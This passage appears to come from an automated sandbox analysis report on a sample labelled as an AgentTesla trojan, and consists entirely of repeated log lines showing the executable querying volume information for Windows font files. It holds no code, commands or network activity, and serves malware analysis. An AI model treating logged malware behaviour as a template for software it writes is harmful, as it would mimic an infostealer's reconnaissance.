                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
